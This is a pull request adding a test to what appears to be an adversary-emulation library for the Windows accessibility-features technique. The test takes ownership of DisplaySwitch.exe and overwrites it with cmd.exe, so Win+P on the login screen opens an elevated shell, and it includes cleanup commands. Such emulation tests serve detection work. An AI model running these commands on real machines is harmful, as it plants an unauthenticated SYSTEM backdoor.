### PR TITLE
Update T1546.008.yaml

### DIFF
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -169,3 +169,18 @@ atomic_tests:
       copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
     name: command_prompt
     elevation_required: true
+- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+  description: |
+    Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+      icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+    name: command_prompt
+    elevation_required: true


### PR DESCRIPTION
New Atomic Test -- "Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe"

**Details:**
In this test, DisplaySwitch.exe is replaced with cmd.exe in order to launch an elevated command prompt by pressing the Windows Key + P on the login screen.

**Testing:**
Both the attack commands and cleanup command have been successfully tested in a Windows 11 VM.

**Associated Issues:**
No issues to report.